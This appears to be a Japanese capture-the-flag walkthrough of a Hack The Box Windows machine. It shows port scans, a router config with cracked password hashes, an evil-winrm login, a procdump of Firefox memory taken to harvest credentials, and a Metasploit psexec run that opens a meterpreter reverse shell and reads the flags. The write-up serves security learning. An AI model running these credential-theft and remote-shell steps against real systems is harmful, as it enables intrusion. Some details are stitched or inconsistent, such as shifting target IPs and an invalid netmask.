┌──(hack_lab㉿DESKTOP-O3RMU7H)-[~/HackTheBox]
└─$ nmap -p- --min-rate 10000 10.129.121.71
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-12 09:16 JST
Nmap scan report for 10.129.121.71
Host is up (0.33s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
445/tcp open microsoft-ds
5985/tcp open wsman
49669/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 67.14 seconds
┌──(hack_lab㉿DESKTOP-O3RMU7H)-[~/HackTheBox]
└─$ nmap -sC -sV -p 80,135,445,5985,49669 10.129.121.71
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-12 09:20 JST
Nmap scan report for 10.129.121.71
Host is up (0.42s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-methods:
|_ Potentially risky methods: TRACE
| http-title: Support Login Page
|_Requested resource was login.php
|_http-server-header: Microsoft-IIS/10.0
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds?
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49669/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: -1s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2023-09-12T00:21:17
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 107.46 seconds
version 12.2
no service pad
service password-encryption
!
isdn switch-type basic-5ess
!
hostname ios-1
!
security passwords min-length 12
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
!
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
!
!
ip ssh authentication-retries 5
ip ssh version 2
!
!
router bgp 100
synchronization
bgp log-neighbor-changes
bgp dampening
network 192.168.0.0Â mask 300.255.255.0
timers bgp 3 9
redistribute connected
!
ip classless
ip route 0.0.0.0 0.0.0.0 192.168.0.1
!
!
access-list 101 permit ip any any
dialer-list 1 protocol ip list 101
!
no ip http server
no ip http secure-server
!
line vty 0 4
session-timeout 600
authorization exec SSH
transport input ssh
enable secret で使用するMD5アルゴリズムによりハッシュ化されているため、復号することはできません。 John The Ripperを利用して、ブルートフォースしてみます。
┌──(hack_lab㉿DESKTOP-O3RMU7H)-[~/HackTheBox]
└─$ john --fork=4 -w=/usr/share/wordlists/rockyou.txt hashes
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 512/512 AVX512BW 16x3])
Will run 4 OpenMP threads per process (16 total across 4 processes)
Node numbers 1-4 of 4 (fork)
Press 'q' or Ctrl-C to abort, almost any other key for status
stealth1agent (?)
3 1g 0:00:00:17 DONE (2023-09-10 17:35) 0.05763g/s 50550p/s 50550c/s 50550C/s steamy!!!!..staterr
1 0g 0:00:01:00 DONE (2023-09-10 17:36) 0g/s 52513p/s 52513c/s 52513C/s 2346256..2334364
Waiting for 3 children to terminate
4 0g 0:00:00:59 DONE (2023-09-10 17:36) 0g/s 40471p/s 40471c/s 40471C/s babybillie..baby2626
2 0g 0:00:01:00 DONE (2023-09-10 17:36) 0g/s 54014p/s 54014c/s 54014C/s 1593572584561..1579468342
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
┌──(hack_lab㉿DESKTOP-O3RMU7H)-[~/HackTheBox]
└─$ smbclient -L \\\\10.129.120.32 -U Hazard
Password for [WORKGROUP\Hazard]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.120.32 failed (Error NT_STATUS_IO_TIMEOUT)
Unable to connect with SMB1 -- no workgroup available
「Error: An error of type HTTPClient::ReceiveTimeoutError happened, message is execution expired」が発生する場合は、こちらを確認してみてください!
evil-winrmでログインしてみましょう。
┌──(hack_lab㉿DESKTOP-O3RMU7H)-[~/HackTheBox]
└─$ evil-winrm -i 10.129.96.157 -u Chase -p 'Q4)sJu\Y8qz*A3?d'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Chase\Documents>
問題なく、ログインできました! ここにuser.txtがあるので、フラグを入力してら完了です。
*Evil-WinRM* PS C:\Users\Chase\Desktop> ls
Directory: C:\Users\Chase\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 4/22/2019 9:08 AM 121 todo.txt
-ar--- 9/10/2023 5:25 PM 34 user.txt
*Evil-WinRM* PS C:\Users\Chase\Desktop> cat user.txt
8c1c82a915ecae8373747d0222136d4b
*Evil-WinRM* PS C:\Users\Chase\Desktop> cat todo.txt
Stuff to-do:
1. Keep checking the issues list.
2. Fix the router config.
Done:
1. Restricted access for guest user.
*Evil-WinRM* PS C:\Users\Chase\Desktop>
*Evil-WinRM* PS C:\Users\Chase\Desktop> .\procdump.exe -ma 6152 firefox.dmp
ProcDump v11.0 - Sysinternals process dump utility
Copyright (C) 2009-2022 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com
SYSINTERNALS SOFTWARE LICENSE TERMS
These license terms are an agreement between Sysinternals(a wholly owned subsidiary of Microsoft Corporation) and you.Please read them.They apply to the software you are downloading from technet.microsoft.com / sysinternals, which includes the media on which you received it, if any.The terms also apply to any Sysinternals
* updates,
*supplements,
*Internet - based services,
*and support services
for this software, unless other terms accompany those items.If so, those terms apply.
BY USING THE SOFTWARE, YOU ACCEPT THESE TERMS.IF YOU DO NOT ACCEPT THEM, DO NOT USE THE SOFTWARE.
If you comply with these license terms, you have the rights below.
INSTALLATION AND USER RIGHTS
You may install and use any number of copies of the software on your devices.
SCOPE OF LICENSE
The software is licensed, not sold.This agreement only gives you some rights to use the software.Sysinternals reserves all other rights.Unless applicable law gives you more rights despite this limitation, you may use the software only as expressly permitted in this agreement.In doing so, you must comply with any technical limitations in the software that only allow you to use it in certain ways.You may not
* work around any technical limitations in the software;
*reverse engineer, decompile or disassemble the software, except and only to the extent that applicable law expressly permits, despite this limitation;
*make more copies of the software than specified in this agreement or allowed by applicable law, despite this limitation;
*publish the software for others to copy;
*rent, lease or lend the software;
*transfer the software or this agreement to any third party; or
* use the software for commercial software hosting services.
SENSITIVE INFORMATION
Please be aware that, similar to other debug tools that capture “process state” information, files saved by Sysinternals tools may include personally identifiable or other sensitive information(such as usernames, passwords, paths to files accessed, and paths to registry accessed).By using this software, you acknowledge that you are aware of this and take sole responsibility for any personally identifiable or other sensitive information provided to Microsoft or any other party through your use of the software.
DOCUMENTATION
Any person that has valid access to your computer or internal network may copy and use the documentation for your internal, reference purposes.
EXPORT RESTRICTIONS
The software is subject to United States export laws and regulations.You must comply with all domestic and international export laws and regulations that apply to the software.These laws include restrictions on destinations, end users and end use.For additional information, see www.microsoft.com / exporting .
SUPPORT SERVICES
Because this software is "as is, " we may not provide support services for it.
ENTIRE AGREEMENT
This agreement, and the terms for supplements, updates, Internet - based services and support services that you use, are the entire agreement for the software and support services.
APPLICABLE LAW
United States.If you acquired the software in the United States, Washington state law governs the interpretation of this agreement and applies to claims for breach of it, regardless of conflict of laws principles.The laws of the state where you live govern all other claims, including claims under state consumer protection laws, unfair competition laws, and in tort.
Outside the United States.If you acquired the software in any other country, the laws of that country apply.
LEGAL EFFECT
This agreement describes certain legal rights.You may have other rights under the laws of your country.You may also have rights with respect to the party from whom you acquired the software.This agreement does not change your rights under the laws of your country if the laws of your country do not permit it to do so.
DISCLAIMER OF WARRANTY
The software is licensed "as - is." You bear the risk of using it.Sysinternals gives no express warranties, guarantees or conditions.You may have additional consumer rights under your local laws which this agreement cannot change.To the extent permitted under your local laws, sysinternals excludes the implied warranties of merchantability, fitness for a particular purpose and non - infringement.
LIMITATION ON AND EXCLUSION OF REMEDIES AND DAMAGES
You can recover from sysinternals and its suppliers only direct damages up to U.S.$5.00.You cannot recover any other damages, including consequential, lost profits, special, indirect or incidental damages.
This limitation applies to
* anything related to the software, services, content(including code) on third party Internet sites, or third party programs; and
* claims for breach of contract, breach of warranty, guarantee or condition, strict liability, negligence, or other tort to the extent permitted by applicable law.
It also applies even if Sysinternals knew or should have known about the possibility of the damages.The above limitation or exclusion may not apply to you because your country may not allow the exclusion or limitation of incidental, consequential or other damages.
Please note : As this software is distributed in Quebec, Canada, some of the clauses in this agreement are provided below in French.
Remarque : Ce logiciel étant distribué au Québec, Canada, certaines des clauses dans ce contrat sont fournies ci - dessous en français.
EXONÉRATION DE GARANTIE.Le logiciel visé par une licence est offert « tel quel ».Toute utilisation de ce logiciel est à votre seule risque et péril.Sysinternals n'accorde aucune autre garantie expresse. Vous pouvez bénéficier de droits additionnels en vertu du droit local sur la protection dues consommateurs, que ce contrat ne peut modifier. La ou elles sont permises par le droit locale, les garanties implicites de qualité marchande, d'adéquation à un usage particulier et d'absence de contrefaçon sont exclues.
LIMITATION DES DOMMAGES - INTÉRÊTS ET EXCLUSION DE RESPONSABILITÉ POUR LES DOMMAGES.Vous pouvez obtenir de Sysinternals et de ses fournisseurs une indemnisation en cas de dommages directs uniquement à hauteur de 5, 00 $ US.Vous ne pouvez prétendre à aucune indemnisation pour les autres dommages, y compris les dommages spéciaux, indirects ou accessoires et pertes de bénéfices.
Cette limitation concerne :
tout ce qui est relié au logiciel, aux services ou au contenu(y compris le code) figurant sur des sites Internet tiers ou dans des programmes tiers; et
les réclamations au titre de violation de contrat ou de garantie, ou au titre de responsabilité stricte, de négligence ou d'une autre faute dans la limite autorisée par la loi en vigueur.
Elle s'applique également, même si Sysinternals connaissait ou devrait connaître l'éventualité d'un tel dommage. Si votre pays n'autorise pas l'exclusion ou la limitation de responsabilité pour les dommages indirects, accessoires ou de quelque nature que ce soit, il se peut que la limitation ou l'exclusion ci - dessus ne s'appliquera pas à votre égard.
EFFET JURIDIQUE.Le présent contrat décrit certains droits juridiques.Vous pourriez avoir d'autres droits prévus par les lois de votre pays. Le présent contrat ne modifie pas les droits que vous confèrent les lois de votre pays si celles-ci ne le permettent pas.
This is the first run of this program. You must accept EULA to continue.
Use -accepteula to accept EULA.
このままだと、できない様です。 まずは、-accepteulaをしてくれとあります。
*Evil-WinRM* PS C:\Users\Chase\Desktop> ./procdump.exe -accepteula
ProcDump v11.0 - Sysinternals process dump utility
Copyright (C) 2009-2022 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com
Monitors a process and writes a dump file when the process exceeds the
specified criteria or has an exception.
これでもう一回ダンプを取得してみます。
*Evil-WinRM* PS C:\Users\Chase\Desktop> .\procdump.exe -ma 6152 firefox.dmp
ProcDump v11.0 - Sysinternals process dump utility
Copyright (C) 2009-2022 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com
[19:33:46] Dump 1 initiated: C:\Users\Chase\Desktop\firefox.dmp
[19:33:46] Dump 1 writing: Estimated dump file size is 506 MB.
[19:33:49] Dump 1 complete: 506 MB written in 2.8 seconds
[19:33:49] Dump count reached.
*Evil-WinRM* PS C:\Users\Chase\Desktop> ls
Directory: C:\Users\Chase\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/10/2023 7:33 PM 517803077 firefox.dmp
-a---- 9/10/2023 7:25 PM 424856 procdump.exe
-a---- 4/22/2019 9:08 AM 121 todo.txt
-ar--- 9/10/2023 5:25 PM 34 user.txt
msf6 > use exploit/windows/smb/psexec
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/psexec) > options
Module options (exploit/windows/smb/psexec):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 445 yes The SMB service port (TCP)
SERVICE_DESCRIPTION no Service description to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBSHARE no The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SMBUser no The username to authenticate as
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 172.26.130.26 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
下記のパラメータを設定していきます。
RHOSTS:ターゲットマシン
RPORT:445
SMBPass:4dD!5}x/re8]FBuZ
SMBUser:Administrator
SMBSHARE:ADMIN$
msf6 exploit(windows/smb/psexec) > set RHOSTS 10.129.96.157
RHOSTS => 10.129.96.157
msf6 exploit(windows/smb/psexec) > set RPORT 445
RPORT => 445
msf6 exploit(windows/smb/psexec) > set SMBPass 4dD!5}x/re8]FBuZ
SMBPass => 4dD!5}x/re8]FBuZ
msf6 exploit(windows/smb/psexec) > set SMBUser Administrator
SMBUser => Administrator
msf6 exploit(windows/smb/psexec) > set SMBSHARE ADMIN$
SMBSHARE => ADMIN$
msf6 exploit(windows/smb/psexec) > run
[*] Started reverse TCP handler on 10.10.16.6:4444
[*] 10.129.96.157:445 - Connecting to the server...
[*] 10.129.96.157:445 - Authenticating to 10.129.96.157:445 as user 'Administrator'...
[*] 10.129.96.157:445 - Selecting PowerShell target
[*] 10.129.96.157:445 - Executing the payload...
[+] 10.129.96.157:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (175686 bytes) to 10.129.96.157
[*] Meterpreter session 1 opened (10.10.16.6:4444 -> 10.129.96.157:49686) at 2023-09-12 08:06:48 +0900
meterpreter > shell
Process 4760 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.437]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>cd \users\administrator
cd \users\administrator
C:\Users\Administrator>cd Desktop
cd Desktop
C:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is FA65-CD36
Directory of C:\Users\Administrator\Desktop
02/18/2021 04:00 PM <DIR> .
02/18/2021 04:00 PM <DIR> ..
09/12/2023 04:11 AM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 3,738,165,248 bytes free
C:\Users\Administrator\Desktop>cat root.txt
cat root.txt
'cat' is not recognized as an internal or external command,
operable program or batch file.
C:\Users\Administrator\Desktop>type root.txt
type root.txt
cfd19444abeea6036035be9dcaf6cbb1
C:\Users\Administrator\Desktop>
ポチップ
